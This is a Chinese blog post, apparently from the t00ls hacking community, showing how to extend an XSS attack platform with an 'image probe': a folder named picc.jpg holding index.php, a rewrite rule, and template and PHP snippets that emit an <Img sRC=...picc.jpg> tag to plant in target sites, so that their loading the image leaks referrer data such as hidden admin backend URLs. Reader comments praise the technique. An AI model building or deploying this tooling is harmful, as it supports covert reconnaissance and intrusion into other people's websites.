A-A+

骚操作实现XSS平台图片探测功能

2018年07月08日 15:41 漏洞安全 评论 5 条 阅读 435 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

【闲言碎语】这里是废话,不愿意看的直接看下面的正文。有很多朋友都下载了 https://www.t00ls.net/thread-35990-1-1.html  XSS平台源码。。。虽然我本人对TB无欲无求,但是有些朋友的做法让我很无奈,更改了一个功能或者添加了一个插件,然后就重新把源码打包放到论坛了,然后还收5TB的下载费用。。。你这让收20TB的我情何以堪???我不要面子么?!不过看完电影《我不是药神》,算了,可能我要价太高了。。。收到了很多朋友的反馈,我也相继发表了很多很多关于XSS平台的使用、功能等等等等相关文章。也都收到朋友们的各种私信。也又朋友看到了我记录更新的最新XSS平台,希望我能放出源码。。。其实我自用的XSS平台里面很有很多我个人的小骚操作,有些功能咋说呢。。。感觉思路挺骚的,暂时还没想放出,以后慢慢来好吧。。。感谢大家吧。

 

【前言】土司10周年了。我来土司也有一段时间了,感谢土司的这个平台,让我能认识大家,能让我在群“车”中有一个位置,谢谢土司,谢谢大家。最后希望土司论坛越来越好,期待土司的“百年有我”,今天特献此文给大家,让你看到XSS骚的风范。。。很多时候,大家找到某个网站的漏洞却找不到后台地址,然后本人发了两篇文章:https://www.t00ls.net/thread-38560-1-1.html     https://woj.app/1785.html   专门讲找另类网站找后台。今天正式奉献思路、奉献源码。让你的XSS平台安全的实现“图片探测功能”

 

【正文】相信大家看了上面XSS找后台的案例,应该已经明白大致的思路了,就是通过模拟图片,然后获取来路而已。那么如何实现?有的朋友说把JPG以PHP方式执行,其实这样很不安全。

思路:首先可以建立一个xxx.jpg文件夹,然后在这个文件夹下放index.php文件(这个是默认的首页文件,当然这个可以自己设置),
这样,别人访问 http://www.xss.com/xxx.jpg/   等同于访问  http://www.xss.com/xxx.jpg/index.php 
其实说到这里你的思路就应该已经打开了。如果我们在通过伪静态去掉最后一个 /
那么是不是访问 http://www.xss.com/xxx.jpg  实际等同于访问  http://www.xss.com/xxx.jpg/index.php

这个满满的恶意的小骚操作是不是很阔以??????好那下面讲讲XSS平台如何实现这个功能。这里,如果你是下载我所提供的源码,那么你直接可以下载本文附件,然后解压覆盖到你的平台,增加一个“伪静态”规则就可以了。如果不是本人提供的源码,那你可以按照下方提供的更改思路来操作。

 

[再次说明,如果你的平台已经有大的改动,那么你可以看下面的文字叙述照着更改,如果你的平台直接是用的源码,没有太大的改动,那么直接覆盖附件里面的文件就可以!!!!!!]

第一步,找到  themes\default\templates\project_viewcode.html 这个文件。

然后添加如下代码(注意图片中已经给出大概在文件的第多少行添加):

图片XSS展示代码

图片XSS展示代码

代码内容:

1
2
3
4
5
6
7
<hr/><hr/>
<p style="color: #ff0000;"> 
↓↓↓图片探测系统,只要对方网站可以调用外部图片(或可自定义HTML),请填入下方图片地址(代码),则探测对方数据↓↓↓<br/></p> 
图片插件一:&nbsp; &nbsp; <b style="color: #0012ff;">{$codeurl}/picc.jpg </b> &nbsp; &nbsp;【<a href="https://woj.app/1785.html" target="_blank">若使用此探测,必须勾选‘默认模块’!!!点击查看使用说明</a>】<!-- 这里只是这个图片XSS功能说明地址,你可以自己更改成你的地址或者删掉这个解释说明 -->
<p> 
<pre>
{$imgxss}

第二步:找到 source\project.php 这个文件。
然后添加如下代码(注意图片中已经给出大概在文件的第多少行添加):

图片XSS功能处

图片XSS功能处


代码内容:

1
2
3
4
//这里新增了个图片XSS的展示代码
$imgxss=StripStr("<Img sRC=".$longUrl."/picc.jpg>");
 
$smarty->assign('imgxss',$imgxss);

第三部:增加功能文件。如下图,这个文件夹及实现功能的文件我已经打包放入到本文中。自行下载。

图片XSS功能实现文件夹

图片XSS功能实现文件夹

咱们看一下文件夹里有哪些文件。如下图:

pic xss实现

pic xss实现

最后一步:伪静态规则。


RewriteRule ^([0-9a-zA-Z]{1,6})/picc.jpg$ picc.jpg/index.php?Key=$1

好了,到这里就结束了,再次说一遍,如果你用的不是我提供的源码平台,请自行用思路造轮子,如果你用的是我提供的XSS平台的源码,那么请直接下载附件,然后放到平台根目录覆盖即可。。。!!! 看不懂多看两遍,相信看懂了你会收获很多。
看完了文章,如果觉得还可以请给个回复或者“顶”一下,如果写的不好,那就路过。。。。。。如果你连好评都懒得给,那遇到问题你想想别人会不会给你解答吧。提升一下“境界”嘛。。。附件RAR中也呦注释,自己看吧。

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×
标签:

5 条留言  访客:5 条  博主:0 条

  1. saya

    好文章 学习了 回去试试

  2. 布丁

    关注了 感谢技术分享 附件在哪里呢

  3. R3start

    这思路看得我兴奋不已,楼主牛逼。 感谢分享

  4. 布丁

    附件没看到

  5. aoc

    最近也在研究IMG类型xss,感谢分享

给我留言